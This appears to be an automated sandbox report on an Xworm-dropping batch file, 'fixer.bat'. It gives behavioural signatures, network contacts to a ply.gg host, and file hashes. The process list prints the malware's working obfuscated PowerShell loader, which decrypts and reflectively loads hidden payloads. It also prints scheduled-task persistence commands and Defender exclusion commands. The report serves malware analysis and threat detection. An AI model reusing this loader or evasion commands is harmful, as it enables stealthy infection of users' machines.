Analysis Overview
SHA256
9dda0e575a133a77c6875c92f5749fd23e7522e17b7abab741a14ad50b7ba833
Threat Level: Known bad
The file fixer.bat was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Drops startup file
Checks computer location settings
Adds Run key to start application
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Runs net.exe
Delays execution with timeout.exe
Modifies registry class
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-01 08:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-01 08:22
Reported
2024-06-01 08:23
Platform
win10v2004-20240508-en
Max time kernel
37s
Max time network
38s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Public\\Runtime Broker.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VR+eOn3wLSvgp0FREd6usaXDBdd/ifgqMzCqfEQSJxE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+0Hhw9QG/X6TQoVNa+B1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hHCjm=New-Object System.IO.MemoryStream(,$param_var); $MjNBp=New-Object System.IO.MemoryStream; $cyqkY=New-Object System.IO.Compression.GZipStream($hHCjm, [IO.Compression.CompressionMode]::Decompress); $cyqkY.CopyTo($MjNBp); $cyqkY.Dispose(); $hHCjm.Dispose(); $MjNBp.Dispose(); $MjNBp.ToArray();}function execute_function($param_var,$param2_var){ $ILtmu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YHkEa=$ILtmu.EntryPoint; $YHkEa.Invoke($null, $param2_var);}$XmQRG = 'C:\Users\Admin\AppData\Local\Temp\fixer.bat';$host.UI.RawUI.WindowTitle = $XmQRG;$YkELo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XmQRG).Split([Environment]::NewLine);foreach ($izSch in $YkELo) { if ($izSch.StartsWith('xHKZaTmGffiyfsNVmown')) { $wrsGY=$izSch.Substring(20); break; }}$payloads_var=[string[]]$wrsGY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_9_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_9.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_9.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_9.bat" "
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VR+eOn3wLSvgp0FREd6usaXDBdd/ifgqMzCqfEQSJxE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+0Hhw9QG/X6TQoVNa+B1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hHCjm=New-Object System.IO.MemoryStream(,$param_var); $MjNBp=New-Object System.IO.MemoryStream; $cyqkY=New-Object System.IO.Compression.GZipStream($hHCjm, [IO.Compression.CompressionMode]::Decompress); $cyqkY.CopyTo($MjNBp); $cyqkY.Dispose(); $hHCjm.Dispose(); $MjNBp.Dispose(); $MjNBp.ToArray();}function execute_function($param_var,$param2_var){ $ILtmu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YHkEa=$ILtmu.EntryPoint; $YHkEa.Invoke($null, $param2_var);}$XmQRG = 'C:\Users\Admin\AppData\Roaming\Windows_Log_9.bat';$host.UI.RawUI.WindowTitle = $XmQRG;$YkELo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XmQRG).Split([Environment]::NewLine);foreach ($izSch in $YkELo) { if ($izSch.StartsWith('xHKZaTmGffiyfsNVmown')) { $wrsGY=$izSch.Substring(20); break; }}$payloads_var=[string[]]$wrsGY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD9C6.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | movie-buddy.gl.at.ply.gg | udp |
| US | 147.185.221.16:40572 | movie-buddy.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 16.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
Files
memory/4548-0-0x00007FFA6C413000-0x00007FFA6C415000-memory.dmp
memory/4548-11-0x00007FFA6C410000-0x00007FFA6CED1000-memory.dmp
memory/4548-10-0x0000025DF7610000-0x0000025DF7632000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_51143hyf.xux.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4548-12-0x00007FFA6C410000-0x00007FFA6CED1000-memory.dmp
memory/4548-13-0x0000025DF7A10000-0x0000025DF7A54000-memory.dmp
memory/4548-14-0x0000025DF7A60000-0x0000025DF7AD6000-memory.dmp
memory/4548-15-0x0000025DF54E0000-0x0000025DF54E8000-memory.dmp
memory/4548-16-0x0000025DF7600000-0x0000025DF7612000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3ffce848af907464c20a20e1b430f78a |
| SHA1 | fbcd91a5c226d474235be920cf49e3344893fc1f |
| SHA256 | 25213a6685a6fd21a2aa43c417891703333579ad784f3896976b44bcfcdb009e |
| SHA512 | 1adaf6d68441a32b459b6071dcfdae404ab1e37bb0c6511e08d49717f9043679bdd7ca3324be184ece522e6516eedc04203ffccb5f9ea790bd35a84db9b944bf |
C:\Users\Admin\AppData\Roaming\Windows_Log_9.vbs
| MD5 | a06f75c614ce265849e2dfa949e03993 |
| SHA1 | 72bf7a3ee49244d9ae4fbf92542aef881c83c630 |
| SHA256 | 09c05316992d7c9470baee97e2a90e7d6ba3f390646f610dd8409d499271d9c8 |
| SHA512 | d036970d3376a99c5c4302a8609ee37d7f5dd6e959b3abaa304e904af7a17e5b860678731aa0fd873e23ce8e55a36b876097bd59f32d66054a4d651f54209d41 |
C:\Users\Admin\AppData\Roaming\Windows_Log_9.bat
| MD5 | 1e16a3b0237093cea53d9dff9593c17a |
| SHA1 | 4227feac46a1a00827029d784442ca250c3d27b1 |
| SHA256 | 9dda0e575a133a77c6875c92f5749fd23e7522e17b7abab741a14ad50b7ba833 |
| SHA512 | 74bbadb0adf926c2cb7f7a5df7de53044c12bd9c4cdd21542c1190206ef8e3356678489c94c1fd099c47f2df8d9d9a981bbe71f3127ef7d402154fff76d10898 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 664dee2ab48c3453aa55cac8ecaa5a44 |
| SHA1 | 9211491fa3bfb05ded40ac728c73e05ac7e2aca2 |
| SHA256 | a5d660246afdd69389db1f961d2d7fa69177d198cdbdc327218fde0ea68a4953 |
| SHA512 | dbeb4f57093348ec822e29c8cfd7d74ba0d2d7e26e7157f3fda18b2c3f05012513f1c4c06b2e2801429fa1e595e35dd7ba823c95570135f737f87ce3857fc4ff |
memory/3512-46-0x000002C9F4990000-0x000002C9F49A2000-memory.dmp
memory/3512-47-0x000002C9F4A10000-0x000002C9F4A26000-memory.dmp
memory/4548-48-0x00007FFA6C410000-0x00007FFA6CED1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 00068d34580ca0b4e186c4a6f303b09e |
| SHA1 | 59fe7294b796d4848709b32042246f1bb73acfab |
| SHA256 | 68f5b87085e5d444e29c42f79d24740e03f6658edb8bd2230cce896aac871fa6 |
| SHA512 | 96359172ef18684d8b81977a3d79246427ce0b328e160f2e8b548b338feb081817293b04593960f679915c42a5b86255b30f5b56d06318de8dcb4e77e9d277ea |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6d42b6da621e8df5674e26b799c8e2aa |
| SHA1 | ab3ce1327ea1eeedb987ec823d5e0cb146bafa48 |
| SHA256 | 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c |
| SHA512 | 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f3bc9dee8a80a73a256a69e26fe61c07 |
| SHA1 | bc546c10ce1b4cb47b89ea60498384f88f96fa5a |
| SHA256 | 3c7f3194722f46cb07885da576daf720a5133913b3fbce4a3ef8c8040028364d |
| SHA512 | be2d861832db826ee67f03e6a9151dc6802481c3b5984ce457e43cebecd162f60460ccf7ac5893169d01eff77e2a863c5e323d68e07f2b1b3d6dab5884f7ac6a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 170815947c2c60cbba6d92dbaa5fcda0 |
| SHA1 | ee35a1efbeefb6f4d02b5998ead396927b2b3c3e |
| SHA256 | c8b10f1af94f31c428461e0982d069316295482cc3642589f538ab5f163bbacb |
| SHA512 | b077a95d1fe0308903e0b690c08c96f205485c7f31f355d8e8f8b545f587538d618bdff2d5e93ae97491b2a14a4b9ef79f619c2acf067018567b5e8167727a83 |
C:\Users\Admin\AppData\Local\Temp\tmpD9C6.tmp.bat
| MD5 | d649dd1277ab7c2278808ce9aab3103e |
| SHA1 | b96c2425fb03c8fc44151f3ab0d0ae28a9d81029 |
| SHA256 | 9aa57a271ddad7106f6d49815e88700f69e69056329f65799e82d6ec41bc23f9 |
| SHA512 | f182e5d21fb679eb06db5eb7339c1ab8cc8ad4b7c495a6fba48e095b2d178d253278a13fd026a40146cad35b0c112e12afde614fff40c10fb0ce7296712d62ff |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-01 08:22
Reported
2024-06-01 08:23
Platform
win11-20240426-en
Max time kernel
37s
Max time network
38s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Public\\Runtime Broker.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VR+eOn3wLSvgp0FREd6usaXDBdd/ifgqMzCqfEQSJxE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+0Hhw9QG/X6TQoVNa+B1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hHCjm=New-Object System.IO.MemoryStream(,$param_var); $MjNBp=New-Object System.IO.MemoryStream; $cyqkY=New-Object System.IO.Compression.GZipStream($hHCjm, [IO.Compression.CompressionMode]::Decompress); $cyqkY.CopyTo($MjNBp); $cyqkY.Dispose(); $hHCjm.Dispose(); $MjNBp.Dispose(); $MjNBp.ToArray();}function execute_function($param_var,$param2_var){ $ILtmu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YHkEa=$ILtmu.EntryPoint; $YHkEa.Invoke($null, $param2_var);}$XmQRG = 'C:\Users\Admin\AppData\Local\Temp\fixer.bat';$host.UI.RawUI.WindowTitle = $XmQRG;$YkELo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XmQRG).Split([Environment]::NewLine);foreach ($izSch in $YkELo) { if ($izSch.StartsWith('xHKZaTmGffiyfsNVmown')) { $wrsGY=$izSch.Substring(20); break; }}$payloads_var=[string[]]$wrsGY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_583_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_583.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_583.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_583.bat" "
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VR+eOn3wLSvgp0FREd6usaXDBdd/ifgqMzCqfEQSJxE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+0Hhw9QG/X6TQoVNa+B1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hHCjm=New-Object System.IO.MemoryStream(,$param_var); $MjNBp=New-Object System.IO.MemoryStream; $cyqkY=New-Object System.IO.Compression.GZipStream($hHCjm, [IO.Compression.CompressionMode]::Decompress); $cyqkY.CopyTo($MjNBp); $cyqkY.Dispose(); $hHCjm.Dispose(); $MjNBp.Dispose(); $MjNBp.ToArray();}function execute_function($param_var,$param2_var){ $ILtmu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YHkEa=$ILtmu.EntryPoint; $YHkEa.Invoke($null, $param2_var);}$XmQRG = 'C:\Users\Admin\AppData\Roaming\Windows_Log_583.bat';$host.UI.RawUI.WindowTitle = $XmQRG;$YkELo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XmQRG).Split([Environment]::NewLine);foreach ($izSch in $YkELo) { if ($izSch.StartsWith('xHKZaTmGffiyfsNVmown')) { $wrsGY=$izSch.Substring(20); break; }}$payloads_var=[string[]]$wrsGY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDA81.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | movie-buddy.gl.at.ply.gg | udp |
| US | 147.185.221.16:40572 | movie-buddy.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 16.221.185.147.in-addr.arpa | udp |
Files
memory/2272-0-0x00007FFDFEE33000-0x00007FFDFEE35000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xzuaoncl.0nj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2272-10-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp
memory/2272-9-0x0000029CC9FD0000-0x0000029CC9FF2000-memory.dmp
memory/2272-11-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp
memory/2272-12-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp
memory/2272-13-0x0000029CCA420000-0x0000029CCA466000-memory.dmp
memory/2272-14-0x0000029CCA000000-0x0000029CCA008000-memory.dmp
memory/2272-15-0x0000029CCA010000-0x0000029CCA022000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | df472dcddb36aa24247f8c8d8a517bd7 |
| SHA1 | 6f54967355e507294cbc86662a6fbeedac9d7030 |
| SHA256 | e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6 |
| SHA512 | 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca |
C:\Users\Admin\AppData\Roaming\Windows_Log_583.vbs
| MD5 | 0654dd1a454d5c2b847dce0f59f5b922 |
| SHA1 | bea6406190f36107f5fbad51498fcfbd62367020 |
| SHA256 | 42ff0396b3f9accbb6fe993139b377dfa0291b4c8e27930aa86406fbbaf02fdf |
| SHA512 | c36b6c6ccc8fac3ef0f8477315a7d7ba864691e1620633c4926827ec8ef0ed4274ab5e2efc09f573a70388356b46c43768fc12a3443e4c2988ffac8435921143 |
C:\Users\Admin\AppData\Roaming\Windows_Log_583.bat
| MD5 | 1e16a3b0237093cea53d9dff9593c17a |
| SHA1 | 4227feac46a1a00827029d784442ca250c3d27b1 |
| SHA256 | 9dda0e575a133a77c6875c92f5749fd23e7522e17b7abab741a14ad50b7ba833 |
| SHA512 | 74bbadb0adf926c2cb7f7a5df7de53044c12bd9c4cdd21542c1190206ef8e3356678489c94c1fd099c47f2df8d9d9a981bbe71f3127ef7d402154fff76d10898 |
